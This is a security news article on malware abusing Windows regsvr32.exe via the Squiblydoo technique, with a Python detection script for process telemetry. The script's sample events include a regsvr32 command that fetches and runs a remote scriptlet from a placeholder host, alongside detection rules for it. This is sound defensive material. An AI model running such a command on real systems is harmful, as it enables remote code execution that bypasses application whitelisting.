Security researchers have been observing increasing abuse of regsvr32.exe, a Windows living-off-the-land binary (LOLBin for short). Some of the analyzed malware samples belong to Qbot and Lokibot, according to Uptycs researchers.
Threat Actors Abusing Regsvr32
What is regsvr32? It is a Microsoft-signed command line utility that lets users register and unregister DLL files. When you register such a file, information about it is added to the Registry, Windows's central configuration database, so that the operating system can locate and load the file. This way, other programs can use DLLs with ease.
But now malicious actors have found a way to abuse regsvr32 to load COM scriptlets that in turn execute DLLs. “This method does not make changes to the Registry as the COM object is not actually registered but executed,” the researchers said. The technique is also known as the Squiblydoo technique, and it allows hackers to bypass application whitelisting during the execution phase of the attack kill chain.
The research team has observed more than 500 samples using regsvr32.exe to register .ocx files. It is noteworthy that “97% of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files carrying .xlsb or .xlsm extensions.”
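The two behaviours described above, regsvr32 executing a COM scriptlet without touching the Registry and regsvr32 being launched by an Office application to register a dropped .ocx file, are both visible in process-creation telemetry. The following detection sketch is an added example written for this article; it is not code from Uptycs or from the original report. The JSON event format, the field names (`parent`, `image`, `cmdline`) and the sample events are constructed for the example; the `/n` and `/i:` switches are documented regsvr32 options, and `scrobj.dll` is the Windows scriptlet handler that the Squiblydoo technique loads.

```python
import json
import ntpath

# Office hosts that should rarely, if ever, spawn regsvr32.exe directly.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Constructed process-creation events (JSON lines); not real telemetry.
# Paths in the command lines are kept free of spaces so a simple split() works.
SAMPLE_EVENTS = [
    r'{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32.exe /s C:\\Windows\\System32\\vendorctl.ocx"}',
    r'{"parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32.exe /s C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.ocx"}',
    r'{"parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"}',
    r'{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"}',
]


def parse_event(line):
    """Reduce one JSON event to lower-cased basenames and argument tokens."""
    ev = json.loads(line)
    tokens = ev["cmdline"].split()
    return {
        "parent": ntpath.basename(ev["parent"]).lower(),
        "image": ntpath.basename(ev["image"]).lower(),
        "args": [t.lower() for t in tokens[1:]],  # drop argv[0]
    }


def regsvr32_findings(ev):
    """Return the list of suspicious traits for one regsvr32 process event."""
    findings = []
    if ev["image"] != "regsvr32.exe":
        return findings
    args = ev["args"]
    # Switches may be written with '/' or '-'; normalise for comparison.
    switches = [a.lstrip("/-") for a in args if a[:1] in "/-"]

    # Squiblydoo shape: /i: points at a remote scriptlet and/or the target
    # module is scrobj.dll. With /n, DllRegisterServer is never called, which
    # is why nothing is written to the Registry.
    remote_install = any(s.startswith("i:http") for s in switches)
    if remote_install or "scrobj.dll" in args:
        findings.append("com-scriptlet-via-regsvr32")

    # Office spawning regsvr32 is the delivery pattern the report attributes
    # to 97% of the samples (macro-enabled / binary workbooks).
    if ev["parent"] in OFFICE_PARENTS:
        findings.append("regsvr32-spawned-by-office")

    # Legitimate controls live under Program Files or System32, not in
    # user-writable temp locations.
    if any(a.endswith(".ocx") and ("\\temp\\" in a or "\\appdata\\" in a)
           for a in args):
        findings.append("ocx-from-user-writable-path")
    return findings


def triage(lines):
    """Run the rules over JSON event lines; return (index, parent, findings)."""
    alerts = []
    for n, line in enumerate(lines):
        ev = parse_event(line)
        found = regsvr32_findings(ev)
        if found:
            alerts.append((n, ev["parent"], found))
    return alerts


if __name__ == "__main__":
    for idx, parent, found in triage(SAMPLE_EVENTS):
        print(f"event {idx}: parent={parent} -> {', '.join(found)}")
```

The first event (regsvr32 registering a control under System32 from Explorer) produces no finding, which is the point: the binary itself is benign and signed, so the rules key on the parent process, the install source and the target module rather than on regsvr32.exe alone. In a real deployment the same rules would run against Sysmon event ID 1 or an EDR process-creation feed instead of the constructed JSON lines.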
More technical details are available in the original report.